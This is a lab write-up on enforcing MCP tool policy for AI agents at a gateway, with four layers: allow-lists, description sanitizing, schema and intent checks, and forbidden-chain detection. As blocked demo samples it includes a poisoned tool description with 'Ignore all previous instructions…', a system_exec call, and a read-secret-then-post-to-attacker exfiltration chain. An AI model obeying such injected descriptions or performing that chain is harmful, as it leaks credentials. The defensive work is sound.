Locking Down MCP Tools at the Gateway, by Tom O'Rourke

The customer request. "The gateway must expose only approved tools to the agent (deny-by-default) with pinned manifests / schemas and sanitized descriptions (no prompts in metadata). At runtime it must allow or deny based on tool name + args + intent / risk tier and block dangerous chains."

That's four enforcement requirements, and each one needs a different mechanism. Deny-by-default is a tool-name allow-list — the gateway's CEL policy on mcp.tool.name covers that. Sanitized descriptions are about what comes back in tools/list: the gateway can't rewrite that, but a tiny middlebox can. Args + intent / risk + chains are stateful, schema-aware checks — that wants a gRPC ext-auth with forwardBody enabled. And the manifest itself is a curated artifact — the agentregistry's natural responsibility.

The lab stitches the four together so that one edit to the curation manifest propagates everywhere within seconds: tools/list updates, the gateway's allow-list updates, the ext-auth's schema + chain rules update. The agent never sees the rogue upstream's poisoned descriptions or its dynamically-added tools.

The four enforcement layers

Layer 1 · deny-by-default
Gateway CEL allow-list
      EnterpriseAgentgatewayPolicy.backend.mcp.authorization
      with a matchExpressions CEL of mcp.tool.name in
      […]. Unapproved names are silently filtered out of
      tools/list and short-circuited on tools/call
      with JSON-RPC -32602. Native to the enterprise data plane.
    
Layer 2 · sanitized descriptions
description-shim middlebox
      A FastAPI proxy in front of the upstream MCP. On tools/list
      it returns the curated tool list verbatim from the manifest —
      ignoring the upstream entirely. The LLM never sees the upstream's
      prompt-injection text, and the upstream can't sneak in new tools after
      curation approved the manifest.
    
Layer 3 · args + risk × intent
tool-policy-extauth (gRPC)
      Wired to the gateway via traffic.extAuth with
      forwardBody.maxSize: 8192. On every tools/call
      it validates the args against the pinned JSON Schema and, for
      riskTier: high tools, checks the JWT's intent
      claim against the tool's requiredIntent.
    
Layer 4 · forbidden chains
Per-session chain detection
      Same ext-auth. Records prev:<Mcp-Session-Id> in
      Redis after each ALLOW. On the next tools/call, looks up
      the previous tool and checks the manifest's forbiddenChains.
      Demo's canonical exfil chain: db_read_secret →
      http_post_external.
    

Intent — purpose, not identity

Layer 3 above gates high-risk tools by a JWT intent claim. It's worth being precise about what that claim means, because audiences routinely mistake it for a user identity. It isn't one.

Both JWTs the in-cluster issuer mints have the same subject — sub: agent. What differs is the intent claim, which represents what the agent is currently doing, not who the agent is.

Intent	Meaning
`general`	Routine work. Read orders, look things up, post to allowed webhooks. The agent's default operating mode.
`ops-secret-rotation`	The agent is in the middle of a secret-rotation workflow — about to update `db.password` in vault, then propagate it. Reading `db_read_secret` is appropriate here because that's literally the job right now.

So db_read_secret is gated by intent because:

The same agent shouldn't be reading the production DB password during routine chat (general) — that's a leak waiting to happen.
The same agent absolutely needs to read it during a rotation flow (ops-secret-rotation) — that's the workflow.

This is purpose-based access control (PBAC)

Distinct from — and complementary to — the patterns most teams already recognise:

RBAC

Role-based

What job title you have. The sibling agentic-mcp-rbac-kind lab demonstrates this — three identities (alice, bob, carol) see different tool sets based on their team/groups claims.

ABAC

Attribute-based

What attributes you have — department, clearance, region. Common in cloud IAM; the AGW CEL policy can express ABAC rules too.

PBAC

Purpose-based

What task you're currently doing. Read a secret during routine chat: deny. Read a secret during a rotation workflow: allow. Same role, same attributes — the difference is the purpose.

In a mature deployment the three layers combine: the agent has role X, currently doing purpose Y, with attributes Z — does that justify calling tool T with args A? The lab focuses on the purpose layer because it's the one most agentic systems get wrong: they let any authenticated agent call any approved tool, regardless of whether the current task actually needs that tool.

Where the intent comes from in production

This lab cheats — the jwt-issuer mints two 10-year tokens at startup and the inspector UI's dropdown picks which one to send. That's a demo shortcut. Real intent claims are:

Issued by an orchestrator per task. When a workflow kicks off "rotate DB password", the orchestrator gets a fresh JWT with intent: ops-secret-rotation and a short TTL (say, 15 min). The agent loses access to high-risk tools as soon as the workflow ends.
Step-up via human approval. Default JWT is intent: general. The agent asks the operator "I need to rotate the password — approve?", the operator MFA-confirms, and a short-lived intent: ops-secret-rotation token is minted for that single operation. The agentic-hitl-kind sibling lab shows the HITL machinery.
Inferred by a classifier from the user prompt. A small model tags the request as a particular task category and the framework upgrades the JWT. Riskier — easier to fool — but useful when the orchestrator doesn't know the workflow type upfront.

The curation manifest

This ConfigMap is the source of truth. Everything downstream — the description-shim's tools/list, the gateway's CEL allow-list, the ext-auth's schema and chain rules — reads from it. Edit a tool's argsSchema here and the ext-auth picks up the change on its next call (it reloads on every Check). Add or remove a tool from approvedTools and the policy-sync controller reapplies the gateway policy within seconds.

YAMLyaml/curation/manifest-configmap.yaml

apiVersion: v1
kind: ConfigMap
metadata:
  name: curation-manifest
  namespace: tool-curation
  annotations:
    ar.dev/mcpserver: "ops-tools:approved-1.0.0"
data:
  manifest.yaml: |
    approvedTools:
      - name: db_read_row
        riskTier: low
        cleanDescription: "Read one row from the orders table by integer id."
        argsSchema:
          type: object
          additionalProperties: false
          required: [row_id]
          properties:
            row_id: { type: integer, minimum: 1 }

      - name: db_read_secret
        riskTier: high
        requiredIntent: ops-secret-rotation
        cleanDescription: "Fetch a named secret from vault. High-risk; only allowed during secret-rotation flows."
        argsSchema:
          type: object
          additionalProperties: false
          required: [key]
          properties:
            key:
              type: string
              enum: ["db.password", "stripe.api_key", "github.token"]

      - name: http_post_external
        riskTier: medium
        cleanDescription: "POST to an external host. Subject to outbound allowlist (enforced elsewhere)."
        argsSchema:
          type: object
          additionalProperties: false
          required: [url]
          properties:
            url:  { type: string, minLength: 8 }
            body: { type: string }

    forbiddenChains:
      - ["db_read_secret", "http_post_external"]

What you'll build

Build it

export AGENTGATEWAY_LICENSE_KEY=...        # or use SECRETS_FILE
./scripts/quick.sh up                       # ~8-12 min first time
./scripts/port-forward.sh                   # leave running
# Inspector UI → http://localhost:8090

Five scripts run in order:

01-cluster.sh — kind + MetalLB + Gateway API CRDs.
02-agentgateway.sh — Solo Enterprise agentgateway 2.3.3 (GAR auth + license).
03-agentregistry.sh — OSS agentregistry + Postgres (best-effort).
04-mcp-and-jwt.sh — build + load all 6 images; deploy rogue-mcp, description-shim, redis, jwt-issuer, tool-policy-extauth, curation-inspector-ui.
05-policy-and-sync.sh — apply Gateway, HTTPRoute, JWT policy, ext-auth policy, initial allow-list; start policy-sync.

Happy path — what an agent actually uses

Start the demo with the three green buttons at the top of the inspector UI. They exercise the approved tools the way an agent would use them — they all succeed. That's the point: the gateway is selectively enforcing, not blanket-denying. Run these first so the audience sees the gateway as a filter, not a wall.

Scene A · ALLOW — read an order row

Click the green A. db_read_row({row_id: 1}) button.

UI sends

POST /mcp/ tools/call name=db_read_row args={"row_id":1} Authorization: Bearer <jwt with intent=general>

Gateway

CEL: mcp.tool.name in ["db_read_row","db_read_secret","http_post_external"] → true ext-auth: args schema row_id ≥ 1 ✓ · riskTier=low (no intent gate) · chain ok → forward to upstream

Result

{"row":{"id":1,"customer":"acme","total":199.00},"fetched_at":"…"}

What happens

A low-risk approved tool with valid args under any intent. The whole stack signs off — CEL allow-list, ext-auth schema check, no risk-tier gate, no chain rule. The trace shows a green

allowed · upstream
      response

block with the actual row.

Layer 1, 3 all pass. Approved tool, valid input, no risk gate. This is the most common call pattern an agent will hit.

Scene B · ALLOW — high-risk read under the right intent

Click the green B. db_read_secret({key: "db.password"}) button — it auto-switches the dropdown to ops-secret-rotation before running.

UI sends

POST /mcp/ tools/call name=db_read_secret args={"key":"db.password"} Authorization: Bearer <jwt with intent=ops-secret-rotation>

ext-auth

tool=db_read_secret in manifest ✓ args schema: key ∈ {db.password, stripe.api_key, github.token} ✓ riskTier=high, requiredIntent=ops-secret-rotation jwt.intent=ops-secret-rotation → match ✓ chain: no prior tool in session → forward

Result

{"key":"db.password","value":"hunter2-prod-2024","fetched_at":"…"}

What happens

Same tool that denies in Scene 3 — but here the JWT carries the matching intent, so the ext-auth's risk-tier × intent rule passes. The audience sees the secret value come back verbatim from the upstream.

Same call, different context = different outcome. The dropdown isn't switching users — it's switching purpose. This is the PBAC story made concrete: the agent is now in a secret-rotation workflow, so reading a secret is appropriate.

Scene C · ALLOW — POST to an approved external host

Click the green C. http_post_external({url, body}) button.

UI sends

POST /mcp/ tools/call name=http_post_external args={"url":"https://hooks.example.com/notify","body":"deploy=success"}

ext-auth

tool in manifest ✓ args schema: url ≥ 8 chars ✓, body string ✓ riskTier=medium (no intent gate) chain: no prior tool → forward

Result

{"would_post":{"url":"https://hooks.example.com/notify","body":"deploy=success"},"fetched_at":"…"}

What happens

Medium-risk tools pass when the args validate. No intent gate. The chain rule only fires if this tool follows db_read_secret in the same session — which it doesn't here, since the trace was reset by the previous click.

Notice what's not happening. The chain rule isn't triggered because the previous tool in this session wasn't db_read_secret. The trace reset between clicks is what makes each demo idempotent.

Denial scenarios — what gets blocked, and why

Below the green buttons the UI has four red buttons. Each one bypasses the LLM and POSTs tools/call directly through the gateway — so you see verbatim which enforcement layer fired. Not all four are attacks. Two are genuine attacks; two are just legitimate-looking calls denied because the policy says so:

ATTACK

Scenes 1 & 4

Genuine attacks. system_exec is a tool no curator would ever approve. The chain db_read_secret → http_post_external is the textbook exfiltration pattern.

BUG

Scene 2

Buggy agent or misconfigured input. db_read_row({row_id: "not-a-number"}) isn't malicious — it's just wrong. Could be a hallucinated argument, a parameter passed as the wrong type, a broken upstream caller. The gateway catches it before it hits the database.

CONTEXT

Scene 3

Right call, wrong context. db_read_secret isn't an attack — it's a legitimate operation that just happens to be high-risk and only appropriate during a secret-rotation workflow. Calling it during routine chat (intent: general) is denied because the purpose doesn't match.

All four denials look red in the trace, but understanding the difference is what sells the architecture. The same gateway catches attacks, agent bugs, AND legitimate-but-out-of-context calls — without the agent having to know any of this is happening.

Scene 1 · ATTACK — call an unapproved tool

Click 1. Deny-by-default — call system_exec.

UI sends

POST /mcp/ tools/call name=system_exec args={"command":"id"}

Gateway

CEL: mcp.tool.name in ["db_read_row","db_read_secret","http_post_external"] → false JSON-RPC error -32602 "Unknown tool: system_exec"

What happens

The tool name isn't in the curated manifest, so the gateway short-circuits before the ext-auth or the upstream see anything. The trace box renders the JSON-RPC error verbatim.

Layer 1 fired. No call left the gateway. No description of system_exec ever reached the LLM either — it's filtered out of tools/list for the same reason.

Scene 2 · BUG — call an approved tool with bad args

Click 2. Args schema — db_read_row({row_id:"not-a-number"}).

UI sends

POST /mcp/ tools/call name=db_read_row args={"row_id":"not-a-number"}

ext-auth

tool=db_read_row in manifest ✓ args schema: row_id must be integer ≥ 1 — got "not-a-number" HTTP 400 Body: 'ext-auth: args for "db_read_row" violate schema: row_id: Invalid type. Expected: integer, given: string'

What happens

The gateway's CEL allows the name through; the ext-auth then parses the forwarded JSON-RPC body, validates the args against the pinned schema, and rejects with a 400. The upstream never sees the call.

Layer 3 fired. The schema is part of the curated artifact — change it in the ConfigMap and the ext-auth picks up the change on the next request.

Scene 3 · CONTEXT — high-risk call without the right intent

Leave the intent dropdown on general, then click 3. Risk-tier — db_read_secret under intent general.

UI sends

POST /mcp/ tools/call name=db_read_secret args={"key":"db.password"} Authorization: Bearer <jwt with intent=general>

ext-auth

tool=db_read_secret riskTier=high requiredIntent=ops-secret-rotation jwt.intent=general → mismatch HTTP 403 Body: 'ext-auth: tool "db_read_secret" is risk=high and requires intent="ops-secret-rotation" (got "general")'

What happens

The tool is curated and the args are valid — but it carries riskTier: high with

requiredIntent:
      ops-secret-rotation

. The caller's JWT carries intent: general. The ext-auth denies.

Switch the dropdown to ops-secret-rotation and the same button succeeds. Intent is part of the JWT, signed by the in-cluster issuer — a caller can't spoof it.

Scene 4 · ATTACK — sequence the rogue chain

Switch intent to ops-secret-rotation, then click 4. Forbidden chain.

UI sends

1. tools/call db_read_secret {"key":"db.password"} → ALLOW 2. tools/call http_post_external {"url":"https://attacker..."} → DENY

ext-auth

Call 1: tool in manifest ✓, args valid ✓, intent OK ✓ → SET prev:<sess-id> = "db_read_secret" → ALLOW Call 2: tool in manifest ✓, args valid ✓ → GET prev:<sess-id> = "db_read_secret" → ("db_read_secret","http_post_external") ∈ forbiddenChains → DENY 403 'ext-auth: forbidden chain db_read_secret → http_post_external'

What happens

Each call individually is fine. The pair isn't. Redis carries the session's last-allowed tool so the ext-auth can recognise the chain on the second call.

Layer 4 fired. This is what a real "secret exfil" attack looks like — read a credential, then post it out. The manifest's forbiddenChains declares the pair as a non-starter.

Live edit — registry as authority

Everything above runs through the curated manifest. To prove the registry is the actual authority, edit it live:

# Remove db_read_secret from approvedTools (just delete its block)
kubectl -n tool-curation edit configmap curation-manifest

# Within ~5s, policy-sync logs:
#   applied tool-curation/mcp-tool-allowlist — allowed tools: [db_read_row http_post_external]

# In the inspector UI, the MIDDLE panel (gateway tools/list) updates —
# db_read_secret is now absent. Re-clicking attack 3 returns -32602.

This is the proof point. The gateway policy CR was never edited by hand. The ext-auth's rules weren't redeployed. The description-shim wasn't restarted. One kubectl edit configmap propagated through three subsystems in a few seconds — because they're all reading from the same curated artifact.

Notes on the demo

Below is the customer ask this lab was built against — quoted verbatim — and a row-by-row mapping showing which component of the demo proves each requirement. Use this as the closing slide: "here's what you asked for, and here's where each part lives in the demo."

Tool catalog hygiene + semantic least privilege + compositional constraints. The gateway must expose only approved tools to the agent (deny-by-default) with pinned manifests / schemas and sanitized descriptions (no prompts in metadata). At runtime it must allow / deny based on tool_name + args + intent / risk tier and block dangerous chains (sequence / graph rules).

DENY-BY-DEFAULT

"expose only approved tools to the agent"

Layer 1 — gateway CEL allow-list. The EnterpriseAgentgatewayPolicy uses matchExpressions: ['mcp.tool.name in […]']. Unapproved names are filtered from tools/list AND short- circuited on tools/call with JSON-RPC -32602. See: Scene 1 (call system_exec). Code: policy-sync/main.go writes the policy from the curation manifest.

PINNED SCHEMAS

"pinned manifests / schemas"

Layer 3 — ext-auth + JSON Schema. Every tool's argsSchema is pinned in the curation-manifest ConfigMap. The ext-auth reloads the manifest on every call and validates tools/call arguments against the pinned schema with gojsonschema. See: Scene 2 (db_read_row({row_id: "not-a-number"})) — verbatim 400-body deny. Code: tool-policy-extauth/main.go.

SANITIZED DESCRIPTIONS

"sanitized descriptions (no prompts in metadata)"

Layer 2 — description-shim middlebox. A FastAPI proxy in front of the upstream MCP. On tools/list it returns the curated manifest's cleanDescription verbatim, ignoring whatever the upstream sent. Prompt-injection text never reaches the LLM. See: right panel of the inspector UI — lookup_user wears a "⚠ poisoned description" badge with "Ignore all previous instructions…" in the body. The middle panel shows the clean curated version. Code: description-shim/app.py.

RISK × INTENT

"allow / deny based on intent / risk tier"

Layer 3 — purpose-based access control (PBAC). Tools tagged riskTier: high carry a requiredIntent. The ext-auth reads the intent claim on the request and denies if it doesn't match. Same agent, different intent at different times = different outcome. See: Scene B (allow — db_read_secret with matching intent) vs Scene 3 (deny — same tool, wrong intent). Read the Intent — purpose, not identity section above for the PBAC framing.

CHAIN RULES

"block dangerous chains (sequence / graph rules)"

Layer 4 — per-session chain detection. The ext-auth writes prev:<Mcp-Session-Id> to Redis on every ALLOW. The next call checks the pair against the manifest's forbiddenChains. Sequence-aware, no graph traversal needed for the demo's pair-rule, easy to extend to longer rules. See: Scene 4 — db_read_secret allows; the immediately-following http_post_external denies with verbatim "forbidden chain…in session <sid>". Code: tool-policy-extauth/main.go + redis.

SOURCE OF TRUTH

All five answers above share one source: the curation manifest.

One ConfigMap, three controllers. The policy-sync controller, the description-shim, and the tool-policy-extauth all read from curation-manifest. Edit it, hit save, and every enforcement layer reconciles in seconds. The Live edit section below shows it end-to-end. In production this content would arrive from agentregistry's MCPServer artifact via arctl publish — see agentregistry CRDs.

Teardown

./scripts/quick.sh teardown

Versions

Built and verified on both editions:

OSSvalidated 2026-06-18

agentgateway (OSS)v1.3.0

Gateway APIv1.5.1

Enterprisevalidated 2026-06-18

Solo Enterprise for agentgatewayv2.3.4

Solo Enterprise for agentregistryv0.0.10

agentregistry (OSS)v0.3.2

Gateway APIv1.4.0

The four enforcement layers

Gateway CEL allow-list

description-shim middlebox

tool-policy-extauth (gRPC)

Per-session chain detection

Intent — purpose, not identity

This is purpose-based access control (PBAC)

Where the intent comes from in production

The curation manifest

What you'll build

Build it

Happy path — what an agent actually uses

Scene A · ALLOW — read an order row

Scene B · ALLOW — high-risk read under the right intent

Scene C · ALLOW — POST to an approved external host

Denial scenarios — what gets blocked, and why

Scene 1 · ATTACK — call an unapproved tool

Scene 2 · BUG — call an approved tool with bad args

Scene 3 · CONTEXT — high-risk call without the right intent

Scene 4 · ATTACK — sequence the rogue chain

Live edit — registry as authority

Notes on the demo

Teardown

See also

Versions